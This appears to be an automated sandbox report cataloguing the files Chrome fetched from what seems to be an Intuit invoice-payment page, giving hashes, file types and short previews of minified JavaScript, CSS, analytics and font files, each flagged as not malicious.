                                                Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7437],{60139:function(t){function e(t){return function(){return t}}var r=function(){};r.thatReturns=e,r.thatReturnsFalse=e(!1),r.thatReturnsTrue=e(!0),r.thatReturnsNull=e(null),r.thatReturnsThis=function(){return this},r.thatReturnsArgument=function(t){return t},t.exports=r},63620:function(t,e,r){var n=r(60139);t.exports=n},37437:function(t,e,r){r.d(e,{gN:function(){return pn},l0:function(){return vn},J9:function(){return sn},j0:function(){return dn}});var n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)e.hasOwnProperty(r)&&(t[r]=e[r])},n(t,e)};function o(t,e){function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}var i=function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                Category:dropped
                                                Size (bytes):341230
                                                Entropy (8bit):5.632665034752916
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:AEFC392F6B8BDC8BA73B442DC26EBD1F
                                                SHA1:F26F99F4C9E4EA85C1917EA0811F48F9898FD50B
                                                SHA-256:3BEB67861E89AF64AD549C839B194CE4A1ADFDDCD1A81A5EDF11C9CAE4100BCD
                                                SHA-512:08C8F824FA791A58534C54316C9099649B41E359B54A294F8A62375A869C2CCBDD07AC0E48A386724D5823F1B6FC217BB05E6E0E41D63C5D4EA76ECB4921300B
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4556,2378,1193,7956,4577,8367,2001,4409,9863],{13484:function(e,t,a){var r=a(95627),s=a.n(r),n=a(67294),o=a(44012),i=a(72468),l=a(54623),c=a(58367),d=a(29863),p=a(51245),m=a(85893);t.Z=e=>{let{closeCallback:t,loginCallback:a,isAutoPay:r}=e;return(0,m.jsxs)(n.Fragment,{children:[(0,m.jsx)(i.Z,{"data-cy":"pre-login-splashscreen",children:(0,m.jsxs)("div",{"data-testid":"Pre login splashscreen",className:s().dynamic([["1367718950",[p.colors.gray05,p.breakpoints.sm,p.breakpoints.md,p.breakpoints.md,p.breakpoints.md,p.breakpoints.md]]])+" pre-login dialog",children:[(0,m.jsx)("div",{onClick:t,"aria-label":"Close","data-cy":"pre-login-splash-screen-btn-close",className:s().dynamic([["1367718950",[p.colors.gray05,p.breakpoints.sm,p.breakpoints.md,p.breakpoints.md,p.breakpoints.md,p.breakpoints.md]]])+" close",children:(0,m.jsx)(c.default,{width:20,height:17})}),(0,m.jsx)("div",{className:s().dynamic([["1367718950",[p.colors
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (19015)
                                                Category:downloaded
                                                Size (bytes):19188
                                                Entropy (8bit):5.212814407014048
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:70D3FDA195602FE8B75E0097EED74DDE
                                                SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
                                                SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
                                                SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
                                                Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (26070)
                                                Category:dropped
                                                Size (bytes):26120
                                                Entropy (8bit):5.584184258223017
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:187DAC041B6952B46DF22F000C9BFCBF
                                                SHA1:ADDC7DC13DBCE110ECB5E25DAA6A50D33115108A
                                                SHA-256:2465E5F0F95899C414B78A00E553922394EBD3905973AFA626BE54FA6EAB39CA
                                                SHA-512:BF181B387FF58C9127C256B0A671B2EA89D14AE8DC8DCC5F8996A07F5A9814FACD72C52A47E6D06DF7DCD0402D3F2BA734CE468D9ACD1F4902591CB5DEAAAFCA
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6019,6721],{89228:function(e,i,t){var s=t(95627),n=t.n(s),a=t(67294),o=t(54490),l=t(44012),c=t(57230),r=t(51459),d=t(6721),m=t(98343),x=t(80718),y=t(51245),p=t(85893);const u=e=>{const{gratuityValue:i,invoiceNumber:t,invoiceDueDate:s,invoiceAmount:u,currency:f,isPartiallyPaid:_,feeAmount:h,useRedesign:g}=e,{0:b,1:j}=(0,a.useState)(!1),w=(0,x.C)(840);return(0,p.jsxs)(a.Fragment,{children:[(0,p.jsx)(n(),{id:"69754084",dynamic:[g?"0 14px":"0px",y.breakpoints.md,y.breakpoints.sm],children:[`.invoice-info.__jsx-style-dynamic-selector{padding:0px;margin:${g?"0 14px":"0px"};}`,`@media (max-width:${y.breakpoints.md}){.invoice-info.__jsx-style-dynamic-selector{max-width:400px;margin:5px auto;}}`,`@media (max-width:${y.breakpoints.sm}){.invoice-info.__jsx-style-dynamic-selector{max-width:576px;}}`]}),(0,p.jsxs)("ul",{"aria-label":"invoice info list",className:n().dynamic([["69754084",[g?"0 14px":"0px",y.breakpoints.md,y.breakp
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (1862)
                                                Category:downloaded
                                                Size (bytes):1912
                                                Entropy (8bit):5.216661754767447
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:8501E5217BC56EDBFF6D8ED4A56D7F20
                                                SHA1:69EE8441B7E862D512E1C4BE10606A51AD169116
                                                SHA-256:6CF06BFD2C0B9D76B8FF70D0CEDCCE1BFAFFE974C139023CFDD12A9621E4F51F
                                                SHA-512:41D1C86742F0375C89C57CEE48939EBEBC52071E6B3EE343AD3D25DF10B5F17388E8610D528891CE9F7F5AF0C601F87E633A7A6F1DF77ACFC8DE2537A76FD5BE
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://static.cns-icn-prod.a.intuit.com/_next/static/chunks/1962.9dd337ed07722414.js
                                                Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1962],{21962:function(e,r,s){s.r(r);s(67294);var t=s(51245),i=s(85893);r.default=e=>{let{width:r=20,height:s=20,color:l=t.colors.gray04}=e;return(0,i.jsx)("svg",{width:r,height:s,viewBox:"0 0 18 18",version:"1.1",xmlns:"http://www.w3.org/2000/svg",xmlnsXlink:"http://www.w3.org/1999/xlink",children:(0,i.jsx)("g",{id:"Web",stroke:"none",strokeWidth:"1",fill:"none",fillRule:"evenodd",children:(0,i.jsx)("g",{id:"Payment-service-fails-(1)",transform:"translate(-557.000000, -571.000000)",children:(0,i.jsx)("g",{id:"Group-3",transform:"translate(558.000000, 572.000000)",children:(0,i.jsxs)("g",{id:"Group-2",children:[(0,i.jsx)("circle",{id:"Oval",stroke:l,cx:"8",cy:"8",r:"8"}),(0,i.jsxs)("g",{id:"Group-9",transform:"translate(5.333333, 3.555556)",fill:l,children:[(0,i.jsx)("path",{d:"M3.34828102,6.22222222 L1.93721973,6.22222222 L1.93721973,5.76488287 C1.93721973,4.99462712 2.12855007,4.58542876 2.7264574,4.00773694 L3.2645
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                Category:dropped
                                                Size (bytes):75858
                                                Entropy (8bit):5.3482850912409114
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:650F21AC4FD9546E505724ABE1DB85E7
                                                SHA1:9882E3FAE26B0015E7A83A84D2B1808830B0BA22
                                                SHA-256:21CCAA43F628E9DC521F0E75E6DB23AFC7B63E9A9403D1E610AFE676C02BC0E1
                                                SHA-512:86E34BA42A67B3002FCF87A22921B6934787169F67DF65334B5DC330A442D0686C1158C69785F84E0C802D9C083018767304FC96074541BDC2A22752C6DB452B
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[179],{60932:function(e,t){"use strict";function r(e,t,r,n,o,a,i){try{var s=e[a](i),l=s.value}catch(u){return void r(u)}s.done?t(l):Promise.resolve(l).then(n,o)}t.Z=function(e){return function(){var t=this,n=arguments;return new Promise((function(o,a){var i=e.apply(t,n);function s(e){r(i,o,a,s,l,"next",e)}function l(e){r(i,o,a,s,l,"throw",e)}s(void 0)}))}}},6495:function(e,t){"use strict";function r(){return r=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e},r.apply(this,arguments)}t.Z=function(){return r.apply(this,arguments)}},92648:function(e,t){"use strict";t.Z=function(e){return e&&e.__esModule?e:{default:e}}},91598:function(e,t){"use strict";function r(e){if("function"!==typeof WeakMap)return null;var t=new WeakMap,n=new WeakMap;return(r=function(e){return e?n:t})(e)}t.Z=function(e,t){if(!t&&e&&e.__esModule)return
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (20915)
                                                Category:downloaded
                                                Size (bytes):274974
                                                Entropy (8bit):5.549229662803543
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:48A42CC92BC9D34BFF6CA330C27ED510
                                                SHA1:9938BD1B152564FD27E32A96D892D22C8C70F99A
                                                SHA-256:30508EC04F49948C59CE4D41BF94A519B69C97C766A6F144EC95F563ED015F7F
                                                SHA-512:E494730699DD0CD960B2212135E2289D8AB22E482E89F467D29856C964BEE3C1B92FDBEC8E897A883A810BD779E12306864BC6CB2A072E4E7A7D937744B7B04A
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.googletagmanager.com/gtag/js?id=AW-1051519679
                                                Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_ads_datatos","priority":22,"vtp_instanceDestinationId":"AW-1051519679","tag_id":119},{"function":"__ogt_cps","priority":12,"vtp_cpsMode":"ALL","tag_id":105},{"function":"__ogt_1p_data_v2","priority":12,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":""
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (2924), with no line terminators
                                                Category:dropped
                                                Size (bytes):2924
                                                Entropy (8bit):5.2044923261312155
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:B0393F9E5CC4F9BA754FA7134FFDEB07
                                                SHA1:8B3682ADB789E69DCD2557AD966CDE2B27AACBAA
                                                SHA-256:FCDF12C7B4272785CB70E32D5EEC82553768C68B8204B9B121606C5C13E3603E
                                                SHA-512:C7B3489D24C8A9C380D4E854C3F54B8241178860C6ADCEE3580DFF3C5E9E56A3B7312E191557A7CB67E5E86F1E7F450593781E473D3A4D774E91B8EC19FD7BB9
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:self.__BUILD_MANIFEST=function(e,s,c,t,a,i,n,d,r,p,f){return{__rewrites:{beforeFiles:[],afterFiles:[],fallback:[]},"/":[e,s,c,d,r,f,"static/chunks/pages/index-94dd346e6cd9cd1d.js"],"/PaymentBlocked":[e,s,"static/chunks/pages/PaymentBlocked-e462043e1659035f.js"],"/_error":["static/chunks/pages/_error-68f95168e6ffc81e.js"],"/billingAgreement":["static/chunks/pages/billingAgreement-3f39fa3b249bb905.js"],"/depositAccepted":[e,s,c,t,"static/chunks/pages/depositAccepted-79010ac07a97fa07.js"],"/depositDeclined":[e,s,c,t,"static/chunks/pages/depositDeclined-bee17ef6ac6c9f90.js"],"/depositPending":[e,a,i,s,c,t,n,"static/chunks/pages/depositPending-1b6d9d0718a7c838.js"],"/error410":[e,s,"static/chunks/pages/error410-7741d19a3075877e.js"],"/error412":[e,s,"static/chunks/pages/error412-476ae41243d19d1c.js"],"/error500":[e,s,"static/chunks/pages/error500-7fa050389a2de8c1.js"],"/errorTokenExpired":[e,s,"static/chunks/pages/errorTokenExpired-e5651ab6b79cfe71.js"],"/estimateAccepted":[e,s,c,t,"static/
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):2238
                                                Entropy (8bit):5.036353746419716
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:26EE0147B7D243991D94B48A2B8B5675
                                                SHA1:5B238F8F3BF5EF7404B2BB179C7650D84EFD4467
                                                SHA-256:3562DD7B75C6C5FE3071732CD91805FCA5E7E3EE08C3F7E75577FEC74F12B545
                                                SHA-512:35530EDDF3C3149D8429868CE209E16873D356A50BF762A907F1C8E632EA7A7F30CB53094DF97DEA7C77624D0053A52C500CF1886413180B45311634AC3ED016
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:{"integrations":{"Amplitude":{"apiKey":"e1789c803aea5a6e20deca508647bdf6","appendFieldsToEventProps":{},"batchEvents":false,"deviceIdFromUrlParam":false,"enableLocationListening":true,"eventUploadPeriodMillis":30000,"eventUploadThreshold":30,"forceHttps":false,"groupTypeTrait":"","groupValueTrait":"","mapQueryParams":{},"preferAnonymousIdForDeviceId":false,"saveParamsReferrerOncePerSession":true,"trackAllPages":false,"trackAllPagesV2":false,"trackCategorizedPages":true,"trackGclid":false,"trackNamedPages":true,"trackProductsOnce":false,"trackReferrer":true,"trackRevenuePerProduct":false,"trackSessionEvents":false,"trackUtmProperties":true,"traitsToIncrement":[],"traitsToSetOnce":[],"unsetParamsReferrerOnNewSession":false,"useAdvertisingIdForDeviceId":false,"useCustomAmplitudeProperties":false,"useLogRevenueV2":true,"versionName":"","versionSettings":{"version":"3.3.3","componentTypes":["browser","ios","android","server"]},"type":"browser","bundlingStatus":"unbundled"},"Repeater":{"vers
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (16155)
                                                Category:dropped
                                                Size (bytes):16205
                                                Entropy (8bit):5.297593798819393
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:244E393D06F5F1D3A1797FBA29FAE981
                                                SHA1:6ED631A52EECC1F20637A29AA155FE68AAFCB1A2
                                                SHA-256:048673F84D829B7A76AD01DB675980B0E5A22219D79E497B13E50B5444E9455C
                                                SHA-512:785215ECFF264E5CCE2A510BD36F4AADAFD2B588FA73462ECE057CC3FD5D7622CFDBB714668A14E8CC3895675677BDEE51E291C3CE85A82178CA7EFCD070E09A
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3161],{23161:function(e,t,n){"use strict";n.d(t,{lj:function(){return H},Pz:function(){return q}});var a=n(59499),i=(n(56859),n(67294)),o=n(49153);const r=e=>{if(e&&e.config){var t,n,a,i;if(o.e((function(t){t.addEventProcessor((function(t){return new Promise((function(n){return t.environment=e.config.env,n(t)}))}))})),o.v("config",{ssrtid:e.config.ssrtid,originatingIp:e.config.originatingIp}),e.sale)o.v("sale",{amount:e.sale.amount,type:e.sale.type,txnDate:e.sale.txnDate,currency:null===(t=e.sale.currencyInfo)||void 0===t?void 0:t.currency,id:e.sale.id,referenceNumber:e.sale.referenceNumber,recipientEmail:e.auth.recipientEmail});if(e.companyInfo)o.v("companyInfo",{companyName:e.companyInfo.companyName,language:e.companyInfo.language,region:e.companyInfo.region,primaryEmail:null===(n=e.companyInfo.contactMethods)||void 0===n||null===(a=n[0])||void 0===a||null===(i=a.primaryEmail)||void 0===i?void 0:i.emailAddress});e.payment&&o.v(
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:Web Open Font Format (Version 2), TrueType, length 35236, version 2.19660
                                                Category:downloaded
                                                Size (bytes):35236
                                                Entropy (8bit):7.9948931922381945
                                                Encrypted:true
                                                SSDEEP:
                                                MD5:4451062C2D96D0EB928E7A55A7C7DA34
                                                SHA1:14F55C3E48227598F5BE2EA14AEA1FB8056DBA9D
                                                SHA-256:063208866C888AD85F806C644A7944C729A9E81693AD1BC7979EB752D97442BC
                                                SHA-512:8722936631BF4A0926C8C28A0D8379CA11600A94D38946896D168FAFCA0FA3E2F15B412133E1B8121AF1A498AC617607FB2FB1E8308B44B2B4BFEAD4963F39E6
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://static.cns-icn-prod.a.intuit.com/fonts/AvenirNext-forINTUIT-Web-Fonts/AvenirNext+forINTUIT+W05+Mediu_web.woff2
                                                Preview:wOF2...................A..L........................l....`..`.....d..P...@..V.6.$..(..,.. ..K. ../[.sq.O6z.@.m3.b..7prK..=.L Fo....m3B;....Y.f...OP2n.q[......%#*jL..>1.qjE)zMw.3(......`.2}7......{..C.j.....T..?0.t..]f.w..Y.....1... ..`.C,..o%p...n......p>....m.[.."5c9v..g...'q...^...1..R..".l9....w..;."M~.<.....a.U.\......d..n.4..%E.i.6v1....mRM.."..........l..1a.....J.9..c.cR.. B".. .(*%k).B.].!.._.gT....c....$...?'..Tm].+.](.^.._.N..&Z.........kz.L....SB.....]...Q.A#....F.V.q.A......=6.^..!@KE.Ofr.s..!.,)..E%......1..\w[*.z*.....E;.m.TrM.g.X..7.........O..+f..vfB.%..6ms.k.....Q.*Z....i.H.....+...i.,h.L...=iq.*.N..{[.]~...Ut.@p...P...9.....#.#...0..ox..?.......~.PT..*.`...'.i"WZ....^..l.E~....a....7......bp.Q......,.Q.......ZY-.....;.."e..E..V...O...:?;:o#.`...... .w/.....&%.....7.^0.o..h..=.0.....N.^0..5Db.x....../Tl.........[..H`,~..&.@.Z..........-&.*...PX2..+..........I..7...<.q.?K...z....H$./......N...!.=...kR...-...#&.q.$.....L?Sbwe.I
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (905)
                                                Category:dropped
                                                Size (bytes):955
                                                Entropy (8bit):5.45203517363015
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:54378336344B3DE8529083EF5D0707AB
                                                SHA1:22B2C74ADC2587EFC1D46ACE3A26E061A66F0957
                                                SHA-256:630257DBFE8089B6F1F41B21F6376B15E0D4AE99D77CD3DD4DD11851A1922FD2
                                                SHA-512:1D140EBE12316A47874ED69397903B67ADA7EE3D2A22A581360DCCEE492C0883FF3245298A7F851F8E421B06057352F2F5360D6D05039DC557B67783155916D2
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7868],{77868:function(e,l,c){c.r(l);c(67294);var i=c(51245),r=c(85893);l.default=e=>{let{width:l=24,height:c=24,color:s=i.colors.white,className:t=""}=e;return(0,r.jsx)("svg",{xmlns:"http://www.w3.org/2000/svg",width:l,height:c,viewBox:"0 0 24 24",className:t,"aria-label":"Print",children:(0,r.jsxs)("g",{fill:"none",fillRule:"evenodd",children:[(0,r.jsx)("path",{"aria-label":"Print path",stroke:s,strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"2",d:"M7.06 10V4c0-.552.448-1 1-1h8c.552 0 1 .448 1 1v6M7 19H5c-1.105 0-2-.895-2-2v-5c0-1.105.895-2 2-2h14c1.105 0 2 .895 2 2v5c0 1.105-.895 2-2 2h-2m-9.943.016c.002-1.105.898-1.999 2.003-1.997l6 .01c1.105.001 1.999.898 1.997 2.002-.002 1.105-.899 1.999-2.003 1.997l-6-.01c-1.105 0-1.999-.898-1.997-2.002z"}),(0,r.jsx)("circle",{cx:"7.003",cy:"13.933",r:"1",fill:s})]})})}}}]);.//# sourceMappingURL=7868.851b65ef7fa1a422.js.map
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                Category:downloaded
                                                Size (bytes):105589
                                                Entropy (8bit):5.174814108773161
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:8F973AC4BDF60F81FBDAE9B37E78047B
                                                SHA1:E25CED1F2DDAE34FC9C5BCAE43CD437B9F8D5C98
                                                SHA-256:D4BE509C23CAC1BFE3D0522FDFC45AEA18798162E3064C7244D06213386E2A7F
                                                SHA-512:75062783F85FBA2C00BA0632991FC6BABD0206A714B26A7132D940359294B0A745BF321F7F205655056E80F697539762B1264330AF5276D51C12F47F4437DB86
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://cdn.segment.com/analytics.js/v1/xCFNzXfegnqVeUJzI6KkruZL5ZzL7iXy/analytics.min.js
                                                Preview:!function(){var t,e,n,r,i={8878:function(t,e,n){"use strict";var r=this&&this.__importDefault||function(t){return t&&t.__esModule?t:{default:t}};Object.defineProperty(e,"__esModule",{value:!0});var i=r(n(325));function o(t,e){return function(){var n=this.traits(),r=this.properties?this.properties():{};return i.default(n,"address."+t)||i.default(n,t)||(e?i.default(n,"address."+e):null)||(e?i.default(n,e):null)||i.default(r,"address."+t)||i.default(r,t)||(e?i.default(r,"address."+e):null)||(e?i.default(r,e):null)}}e.default=function(t){t.zip=o("postalCode","zip"),t.country=o("country"),t.street=o("street"),t.state=o("state"),t.city=o("city"),t.region=o("region")}},4780:function(t,e,n){"use strict";var r=this&&this.__importDefault||function(t){return t&&t.__esModule?t:{default:t}};Object.defineProperty(e,"__esModule",{value:!0}),e.Alias=void 0;var i=r(n(1285)),o=n(9512);function s(t,e){o.Facade.call(this,t,e)}e.Alias=s,i.default(s,o.Facade),s.prototype.action=function(){return"alias"},s.p
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (65325)
                                                Category:downloaded
                                                Size (bytes):144877
                                                Entropy (8bit):5.049937202697915
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:450FC463B8B1A349DF717056FBB3E078
                                                SHA1:895125A4522A3B10EE7ADA06EE6503587CBF95C5
                                                SHA-256:2C0F3DCFE93D7E380C290FE4AB838ED8CADFF1596D62697F5444BE460D1F876D
                                                SHA-512:93BF1ED5F6D8B34F53413A86EFD4A925D578C97ABC757EA871F3F46F340745E4126C48219D2E8040713605B64A9ECF7AD986AA8102F5EA5ECF9228801D962F5D
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css
                                                Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors. * Copyright 2011-2018 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */:root{--blue:#007bff;--indigo:#6610f2;--purple:#6f42c1;--pink:#e83e8c;--red:#dc3545;--orange:#fd7e14;--yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";--font-family-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace}*,::after,::before{box-sizing:border-box}html{font-family:sans
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (58929)
                                                Category:downloaded
                                                Size (bytes):58979
                                                Entropy (8bit):5.567721217764403
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:DBB61563FBE82C516A5DFA738DBFD1D9
                                                SHA1:E6A370D8EA2A804F8B9196EEAA16FC23AD833826
                                                SHA-256:AD860383BEC1B388D3A7A23D610F496F5F0E1798CCF0B56144F2598E7FC1B219
                                                SHA-512:3A29E647B1CD951E6CD3E2F221EBFB5B48B743A32EB26C838AAEAA45B42FD81DAE34C8140D6D0070DA906B55E8DF1CBC220AC1E4F82B2BDBA45349906B5F5D65
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://static.cns-icn-prod.a.intuit.com/_next/static/chunks/6139-309dee1860ca094e.js
                                                Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6139],{3619:function(e,t,s){var o=s(59499),a=s(95627),n=s.n(a),i=s(67294),r=s(86896),l=s(44012),c=s(23240),d=s(37004),m=s(51245),p=s(85893);function x(e,t){var s=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);t&&(o=o.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),s.push.apply(s,o)}return s}function y(e){for(var t=1;t<arguments.length;t++){var s=null!=arguments[t]?arguments[t]:{};t%2?x(Object(s),!0).forEach((function(t){(0,o.Z)(e,t,s[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(s)):x(Object(s)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(s,t))}))}return e}t.Z=e=>{const t=(0,r.Z)(),{withTOS:s=!0,separator:o="\xa0"}=e,{privacyUrl:a,tosUrl:x}=(0,d.getLegalLinks)(t.locale),_={activity_type:"optional_actions",ui_object:"link",ui_action:"clicked",ui_access_point:"tra
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 4158
                                                Category:dropped
                                                Size (bytes):1655
                                                Entropy (8bit):7.8783859431231225
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:D151CB0874ED5E13006E5F38364EC01E
                                                SHA1:3155596C3845863DD4138F3B354D4BA379F083A2
                                                SHA-256:C1C09BC9842129EE1D81812F0513F63BB8AD246442CFF41C9C55E5AE56ECDE3C
                                                SHA-512:48E8F94CFB8F1B47EED462DA514EB645A459A71BF4C014ABA6BE5BBDD0ED381C205C60D38D1DE0B34F2C23D2B1FED3819F54EBAAB363E1A1B663E9D0A97B6D46
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:...........Wmo.6..._.p.+!.mwm.Y.....Z...0.Fd.&2..T.....z...]?m@....x..VRq..>]h.....+m.=Qb.Z...,.....rba..Z....3..r.[.N...`_...x.._.~Kn,...../4....W...8....4*j..C.[E.v.:Y..H..v..w.D.3l...f...x.3.y6.%..NgiyfI...]...q...3...Fd..F;...A..}.R....q.$cy.....L.l0.IQ...o......^..I...Dr,@d..bF9.K..b0(..4o5Mrb...8I....aE....g.......s.l:.h.@?u&[....n..S5..........z:O...Y::..L9. ..qR.XIb.\f"V''x.`MY...pNR5*.*..+l....dTa..i.|0.U,@....k".*.q6...Gt-'..1n.'.j..=Sp.ky...5.W...U.,..d...^.a.].fD.e..4...J*.F4...*...\L@.B.......E...9:.>=.U..~y.....%N.tF..l1..z.!-.`..w...@U..1..\..e;.....CP...s.B....3Pm.t....-..)D[..`.....-S..F.... ..<O.8pX....0..V...{..B...B6.e.d.tX..T'.i.'pg...K..\.:...V..s.Gj'.^..{.~..N*it.&.\v...R.1....?..B..~..x./.....[Z..Y..e.?Y...bK1....y....5 .w.$..T..Xb.8..._....-.g.1*....._....\<E..-o..5....~._...".!..Lk.q1....O......)`-...<.f~}....k.h............s..w..g.B..Ex..,.ro9.wl.w~`...j|4..dZ..ca}!.0{...W..E....-@.o....../oiv5....9...V+.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (923)
                                                Category:downloaded
                                                Size (bytes):973
                                                Entropy (8bit):5.282462750881302
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:6B64452B69B814FA56DB74365D21D6FE
                                                SHA1:47126888E8C7DF6596378B1AD65C0DD9F6630CA3
                                                SHA-256:2E38066FB7FB959C9506D28E33B301C82C09923505E42C6F02E0296067CB77C7
